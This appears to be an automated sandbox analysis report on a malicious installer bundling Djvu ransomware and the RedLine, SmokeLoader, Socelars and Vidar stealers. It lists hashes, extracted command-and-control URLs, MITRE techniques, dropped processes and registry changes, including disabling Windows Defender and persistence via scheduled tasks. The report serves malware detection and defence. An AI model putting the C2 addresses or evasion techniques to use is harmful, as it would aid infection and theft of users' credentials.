djvu | 49bc7d63d4e82e6d645b37f79c7e689fbe0f8313152376b14e68d570c99afb82

Resubmissions

01-12-2021 21:01

211201-zty57abbb5 10

26-11-2021 20:43

211126-zhx4raaae5 10

26-11-2021 20:43

211126-zhs5ssegfq 10

26-11-2021 20:41

211126-zgtpyaegfp 10

Analysis

max time kernel
70s
max time network
1815s
platform
windows7_x64
resource
win7-en-20211104
submitted
26-11-2021 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

11.6MB
MD5

54703a1521ec4d0d257fd72bcb318971
SHA1

40e376a63ff6866eadf5423b5b318fcc25758ffd
SHA256

49bc7d63d4e82e6d645b37f79c7e689fbe0f8313152376b14e68d570c99afb82
SHA512

6234c583ce20b05881872fd95ae71395ad2509eac1969f1a81b49ef972dec3a9414bf5c90adb243fa99374c838ac1f7ef5fb926778209f2004b8a92d1f12aed8

Score

10^/10

djvu redline smokeloader socelars vidar 933 aspackv2 backdoor discovery evasion infostealer ransomware spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.ecgbg.com/

Extracted

Family

smokeloader

Version

2020

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32

Extracted

Family

vidar

Version

48.7

Botnet

933

https://mstdn.social/@anapa

https://mastodon.social/@mniami

Attributes

profile_id
933

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1448-212-0x0000000000CA0000-0x0000000000D64000-memory.dmp	family_redline
behavioral2/memory/1448-216-0x0000000000CA0000-0x0000000000D64000-memory.dmp	family_redline
behavioral2/memory/2748-298-0x0000000000418F02-mapping.dmp	family_redline
behavioral2/memory/2980-316-0x0000000000418F06-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe	family_socelars
\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1924-370-0x0000000001FA0000-0x0000000002075000-memory.dmp	family_vidar
behavioral2/memory/1924-371-0x0000000000400000-0x00000000004D8000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS87682406\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS87682406\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS87682406\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS87682406\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS87682406\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS87682406\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 32 IoCs

Processes:

setup_installer.exesetup_install.exeFri2064de6352.exeFri2060e5abb4.exeFri2050c5d6de57ca396.exeFri20070cd68c3181d0.exeFri2002bea00b158d.exeFri20dd1f5f1511478e4.exeFri2050c5d6de57ca396.exeFri2000bef28b4.exeFri2058e26838.exeFri20a252fe0d.exeFri20405c77f8562ea6.exeFri20be0777551040f32.exeFri20bc562fa6acd.exeFri208f6a10911.exeFri204accdcd745.exeFri20405c77f8562ea6.tmpFri207a27f7f543e5fe.exeFri208f6a10911.tmptaskkill.exeFri20405c77f8562ea6.exeFri2000bef28b4.tmpFri209e1eb19c.exeFri20405c77f8562ea6.tmpdSaU40W5.ExEFri207a27f7f543e5fe.exeFri2002bea00b158d.exeFri207a27f7f543e5fe.exePowerOff.exeFri2058e26838.exewinhostdll.exe

pid	process
1656	setup_installer.exe
1816	setup_install.exe
1472	Fri2064de6352.exe
1836	Fri2060e5abb4.exe
1108	Fri2050c5d6de57ca396.exe
1712	Fri20070cd68c3181d0.exe
1000	Fri2002bea00b158d.exe
1848	Fri20dd1f5f1511478e4.exe
1680	Fri2050c5d6de57ca396.exe
1280	Fri2000bef28b4.exe
1984	Fri2058e26838.exe
1448	Fri20a252fe0d.exe
1764	Fri20405c77f8562ea6.exe
636	Fri20be0777551040f32.exe
696	Fri20bc562fa6acd.exe
1060	Fri208f6a10911.exe
1580	Fri204accdcd745.exe
1732	Fri20405c77f8562ea6.tmp
984	Fri207a27f7f543e5fe.exe
1644	Fri208f6a10911.tmp
2164	taskkill.exe
2208	Fri20405c77f8562ea6.exe
2256	Fri2000bef28b4.tmp
2292	Fri209e1eb19c.exe
2400	Fri20405c77f8562ea6.tmp
2864	dSaU40W5.ExE
2740	Fri207a27f7f543e5fe.exe
2748	Fri2002bea00b158d.exe
2980	Fri207a27f7f543e5fe.exe
2588	PowerOff.exe
2884	Fri2058e26838.exe
2472	winhostdll.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.exeFri2050c5d6de57ca396.execmd.execmd.execmd.exeFri2002bea00b158d.execmd.exeFri2060e5abb4.execmd.execmd.exeFri20070cd68c3181d0.execmd.exeFri2050c5d6de57ca396.exeFri2000bef28b4.execmd.execmd.exeFri2058e26838.execmd.exeFri20405c77f8562ea6.exeFri20a252fe0d.execmd.execmd.exeFri20be0777551040f32.exeFri208f6a10911.exeFri204accdcd745.exeFri207a27f7f543e5fe.exe

pid	process
1472	setup_x86_x64_install.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1816	setup_install.exe
1064	cmd.exe
1416	cmd.exe
1416	cmd.exe
1780	cmd.exe
1780	cmd.exe
1108	Fri2050c5d6de57ca396.exe
1108	Fri2050c5d6de57ca396.exe
2004	cmd.exe
1744	cmd.exe
1368	cmd.exe
1368	cmd.exe
1000	Fri2002bea00b158d.exe
1000	Fri2002bea00b158d.exe
1108	Fri2050c5d6de57ca396.exe
900	cmd.exe
1836	Fri2060e5abb4.exe
1836	Fri2060e5abb4.exe
1692	cmd.exe
1628	cmd.exe
1692	cmd.exe
1712	Fri20070cd68c3181d0.exe
1712	Fri20070cd68c3181d0.exe
1636	cmd.exe
1680	Fri2050c5d6de57ca396.exe
1680	Fri2050c5d6de57ca396.exe
1280	Fri2000bef28b4.exe
1280	Fri2000bef28b4.exe
1616	cmd.exe
1500	cmd.exe
1984	Fri2058e26838.exe
1984	Fri2058e26838.exe
1688	cmd.exe
1764	Fri20405c77f8562ea6.exe
1764	Fri20405c77f8562ea6.exe
1448	Fri20a252fe0d.exe
1448	Fri20a252fe0d.exe
1652	cmd.exe
1764	Fri20405c77f8562ea6.exe
1116	cmd.exe
1116	cmd.exe
636	Fri20be0777551040f32.exe
636	Fri20be0777551040f32.exe
1060	Fri208f6a10911.exe
1060	Fri208f6a10911.exe
1580	Fri204accdcd745.exe
1580	Fri204accdcd745.exe
1060	Fri208f6a10911.exe
984	Fri207a27f7f543e5fe.exe
984	Fri207a27f7f543e5fe.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2212 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

121 ipinfo.io
353 api.2ip.ua
354 api.2ip.ua
410 api.2ip.ua
14 ip-api.com
120 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Fri20a252fe0d.exe

pid process

1448 Fri20a252fe0d.exe

pid	process
2212	icacls.exe

flow	ioc
121	ipinfo.io
353	api.2ip.ua
354	api.2ip.ua
410	api.2ip.ua
14	ip-api.com
120	ipinfo.io

pid	process
1448	Fri20a252fe0d.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

taskkill.exeFri2002bea00b158d.exeFri207a27f7f543e5fe.exe

description	pid	process	target process
PID 2164 set thread context of 2292	2164	taskkill.exe	Fri209e1eb19c.exe
PID 1000 set thread context of 2748	1000	Fri2002bea00b158d.exe	Fri2002bea00b158d.exe
PID 984 set thread context of 2980	984	Fri207a27f7f543e5fe.exe	Fri207a27f7f543e5fe.exe

Drops file in Program Files directory 3 IoCs

Processes:

Fri20405c77f8562ea6.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Fri20405c77f8562ea6.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-UK212.tmp	Fri20405c77f8562ea6.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Fri20405c77f8562ea6.tmp

Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20211126204823.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3028 1580 WerFault.exe Fri204accdcd745.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20211126204823.cab	makecab.exe

pid	pid_target	process	target process
3028	1580	WerFault.exe	Fri204accdcd745.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Fri2060e5abb4.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri2060e5abb4.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri2060e5abb4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri2060e5abb4.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3988 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3124 timeout.exe
3808 timeout.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4044 taskkill.exe
2304 taskkill.exe
2876 taskkill.exe
2484 taskkill.exe
2164 taskkill.exe
2852 taskkill.exe
3648 taskkill.exe

pid	process
3988	schtasks.exe

pid	process
3124	timeout.exe
3808	timeout.exe

pid	process
4044	taskkill.exe
2304	taskkill.exe
2876	taskkill.exe
2484	taskkill.exe
2164	taskkill.exe
2852	taskkill.exe
3648	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEmshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2E2AB6C1-4EFA-11EC-81C7-5A81BCCA0887} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Fri2058e26838.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Fri2058e26838.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Fri2058e26838.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

